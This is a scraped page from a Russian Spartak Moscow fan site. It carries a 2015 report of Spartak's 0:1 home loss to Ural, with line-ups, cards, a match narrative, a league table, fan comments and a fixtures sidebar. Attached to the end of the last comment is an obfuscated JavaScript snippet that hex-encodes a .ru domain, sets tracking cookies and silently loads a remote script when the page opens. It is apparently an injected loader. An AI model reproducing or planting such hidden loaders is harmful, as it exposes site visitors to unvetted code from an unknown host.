Логин: Пароль: Регистрация Забыли пароль?
Добавить в избранное  
 Инстаграм redwhite.ru Официальный канал REDWHITE.RU на youtube  вконтакте redwhite.ru  Твиттер redwhite.ru Главная Поиск Карта сайта Версия для печати
Фотографии
Видео
Таблица ЧР 2017/2018


команда


и

о

Локомотив

Локомотив 17

36

Зенит

Зенит 17

33

цска 17

29

СПАРТАК

СПАРТАК 17

28

Краснодар

Краснодар 17

27

Уфа

Уфа 17

24

Урал

Урал 17

24

Арсенал

Арсенал 17

24

Ахмат

Ахмат 17

22

Рубин

Рубин 17

20

Ростов

Ростов 17

19

Амкар

Амкар 17

18

Тосно

Тосно 17

17

Динамо

Динамо 17

16

Анжи

Анжи 17

16

Хабаровск

Хабаровск 17

12

Лига Чемпионов 17/18
ФНЛ 2017/2018
Молодежные команды


Опрос



Оф.сайт. Спартаковцы уступили "Уралу"
01.11.2015

В матче 14-го тура РОСГОССТРАХ чемпионата России «Спартак» уступил «Уралу» — 0:1.

«Спартак» — «Урал» — 0:1 (0:0)

Москва. Стадион «Открытие Арена». 1.11. 16 228 зрителей.

Судья: В. Безбородов (Санкт-Петербург).

«Спартак»: Ребров (к), Паршивлюк, Кутепов, Таски, Гранат, Глушаков (Зотов, 31), Широков, Попов, Зуев (Зе Луиш, 46), Промес, Давыдов (Озбилиз, 63).

Запасные: Митрюшкин, К. Комбаров, Кутин, Леонтьев, Бакаев.

«Урал»: Арапов, Хозин, Мартынович (Новиков, 68), Данцев, Лунгу, Манучарян (Фидлер, 86), Подберезкин (Ярошенко, 83), Асеведо, Фонтанелло, Сапета, Емельянов.

Запасные: Шубин, Ставпец, Бурмистров, Дорожкин, Билоног, Страндберг, Жариков.

Гол: 0:1 Асеведо (80).

Предупреждения: Таски (34, грубая игра). Гранат (40, срыв атаки). Асеведо (42). Широков (61, срыв атаки). Хозин (72). Зе Луиш (85, неспортивное поведение).

Удаление: Асеведо (2-е предупреждение) (82, неспортивное поведение).

ВСЕ ФОТОГРАФИИ

Чёртову дюжину матчей в нынешнем чемпионате Таски и Боккетти провели бок о бок в центре обороны «Спартака». Наша команда играла и в два центральных защитника, и в три, но неизменно немец с итальянцем выходили в стартовом составе. И вот судьба в виде четырех желтых карточек разлучила сильнейший и сыгранный дуэт оборонцев: Сальваторе из-за дисквалификации наблюдал за ходом встречи с «Уралом» со стороны, а Сердар вышел на поле с первых минут в паре с дебютантом из «Спартака-2» Кутеповым. Для Ильи это был третий матч в основе, но первый – в стартовом составе (до этого он дважды выходил на замены при Валерии Карпине и Мурате Якине в концовках встреч с «Рубином» и «Сменой»).

В подобном сочетании спартаковцы никогда в центре обороны не выступали. Кроме того, никогда в этом сезоне Гранат не выступал на позиции левого защитника, на которой он частенько играл в «Динамо». Но что делать, если Дмитрий Комбаров заболел и не мог помочь партнерам, а Макеев получил травму еще в дерби с динамовцами. Другого футболиста именно этого амплуа в распоряжении Аленичева не было.

…Матч начался с минуты молчания в память о людях, погибших в авиакатастрофе в Египте. Игроки вышли на поле с траурными повязками, и фанатские сектора первые пять минут провели в тишине. Среди зрителей на нашем стадионе был и знаменитый боксер-тяжеловес Рой Джонс, недавно получивший российское гражданство. Еще в 2011 году перед боем с Денисом Лебедевым американец эпатировал публику громким заявлением, что отныне он является поклонником футбольного «Спартака». И вот теперь Джонс впервые воочию наблюдал за игрой спартаковцев, а перед ее началом ему презентовали красно-белую футболку.

В дебюте встречи гости показали, что намерены действовать вторым номером, уповая на контратаки. Десять уральцев сразу обступили собственную штрафную, оставив впереди лишь Манучаряна. Красно-белые завладели мячом и территорией, но до 20-й минуты создали только один опасный момент. После «стандарта» мяч отлетел к Широкову, Роман классно положил корпус и плотно пробил в створ, однако Сапета вынес мяч с линии ворот.

Подопечные Вадима Скрипченко ответили на это ударом Манучаряна в перекладину. Затем лишь отменная реакция Реброва спасла нашу команду от гола после тонкого тычка мяча Асеведо. Спартаковцы же до перерыва грешили не только промахами в обороне, но и большим количеством брака в середине поля, причем зачастую в простых ситуациях.

Во втором тайме на поле появился Зе Луиш, оправившийся от травмы. Он занял место центрфорварда, а Давыдов стал больше действовать на правом краю атаки. Денис первым нанес удар в створ ворот, но голкипер «Урала» Арапов намертво поймал мяч. А вот дальний «выстрел» Подберезкина отразила штанга. Затем Промес, как и в первом тайме, опасно исполнил штрафной – мяч пролетел рядом со штангой. Попов тоже промахнулся из неплохой позиции. «Урал» ответил острым контрвыпадом Асеведо – Ребров оказался на месте.

И все же настырный Асеведо подловил спартаковцев на ошибке – он выскочил по центру один на один с Ребровым и хладнокровно пробил мимо нашего голкипера. Попов тут же мог сравнять счет, но Арапов продемонстрировал хорошую реакцию, переведя мяч на угловой. А последний удар на последних секундах игры у Ивелина откровенно не получился.





Источник: spartak.com
Новость добавил: Duc37





оставлять комментарии могут только зарегистрированные пользователи!

число комментариев:  4

Возврат к списку


0 / 0
Spartu60
Урал , явно был сильнее
0 / 0
КБ Мария
Рой Джонс смотрел эту порнографию???
0 / 0
matyushin
За что им платят.нихрена не играют
0 / 0
avtai
какие на хрен Спартаковцы бездари и лодыриwindow.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20828",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("redwhite.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Хоккейный клуб "Спартак"
Отчеты о выездах
Фото дубля
Друзья
Партнеры
Случайное фото
DSC_0166.JPG
Следующая игра
27 ноября 2017
Спартак Москва бомжи
"Открытие Арена"
начало матча в 19:30
24 ноября 2017
зенит-2 Спартак Москва
Стадион петровский
начало матча в 13:00
26 ноября 2017
Спартак Москва зенит
Стадион "Спартак"
начало матча в 14:00
24 ноября 2017
Трактор Челябинск Спартак Москва
ЛА "Трактор"
начало матча в 17:00
22 ноября 2017
Чайка Спартак Москва
Нижний Новгород
начало матча в 17:00
11 ноября 2017
Сборная России Аргентина
"Стадион Лужники"
начало матча в --:-
Виджет для яндекса
Наши кнопочки

или:

Спартак - фото, видео и отчеты с выездов - RedWhite.Ru